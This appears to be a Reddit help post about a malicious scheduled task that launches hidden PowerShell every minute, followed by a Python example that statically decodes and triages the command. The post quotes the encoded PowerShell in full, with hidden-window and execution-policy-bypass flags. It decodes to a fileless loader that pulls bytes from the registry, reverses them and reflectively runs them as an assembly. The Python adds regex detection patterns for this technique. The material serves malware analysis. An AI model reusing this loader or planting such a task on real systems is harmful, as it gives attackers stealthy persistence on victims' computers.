Malware opening PowerShell every minute. Can anyone please decode and analyse this?
Sept. 25, 2023, 8:26 a.m. | /u/Doge-Believer
Malware Analysis & Reports www.reddit.com
I found malware in Task Scheduler.
It is running "C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" every minute with these arguments:
`-WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAagBhAGsAZQBmAFwAKQAuAGcAZgBmAGYAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=`
I tried to decrypt using base64 ~~but didn't work~~ (working if I use UTF16-LE to decode).
I …
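The decoding step the post describes (Base64, then UTF-16LE), as an added example that is not part of the original post: it statically decodes the `-Enc` argument without running it and flags what the decoded script does, which here is reading a registry value, reversing the bytes and loading them as a .NET assembly. The names `TASK_ARGS`, `INDICATORS`, `extract_encoded_command` and `triage` are hypothetical, and the patterns are illustrative rather than a complete rule set.

```python
import base64
import re

# The scheduled task's arguments exactly as quoted in the post, split for readability.
TASK_ARGS = (
    "-WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc "
    "WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8A"
    "cABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAagBhAGsAZQBmAFwAKQAuAGcA"
    "ZgBmAGYAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAA"
    "WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoA"
    "TABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUA"
    "KAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA="
)

# Hypothetical triage patterns chosen for this example (assumption, not a full rule set).
INDICATORS = {
    "registry_read": r"Get-ItemProperty\s+(HK\w+:\\[^\s)]+)",
    "byte_reversal": r"\[Array\]::Reverse\(",
    "reflective_load": r"Reflection\.Assembly\]::Load\(",
    "entrypoint_invoke": r"EntryPoint\.Invoke\(",
}

def extract_encoded_command(args):
    """Return the script passed via -EncodedCommand or any prefix of it (-e, -enc, ...)."""
    tokens = args.split()
    for i, tok in enumerate(tokens[:-1]):
        name = tok.lstrip("-/").lower()
        if tok[0] in "-/" and name and ("encodedcommand".startswith(name) or name == "ec"):
            raw = base64.b64decode(tokens[i + 1], validate=True)
            # PowerShell wraps UTF-16LE text in the Base64, so a UTF-8 decode looks like garbage.
            return raw.decode("utf-16-le")
    return None

def triage(script):
    """Map indicator name to its first match (the capture group when the pattern has one)."""
    hits = {}
    for name, pattern in INDICATORS.items():
        m = re.search(pattern, script, re.IGNORECASE)
        if m:
            hits[name] = m.group(1) if m.groups() else m.group(0)
    return hits

if __name__ == "__main__":
    script = extract_encoded_command(TASK_ARGS)
    print(script)
    for name, value in triage(script).items():
        print(f"{name}: {value}")
```

The `registry_read` hit gives the registry key where the byte array is stored, which is the next artifact to export and preserve before removing the scheduled task.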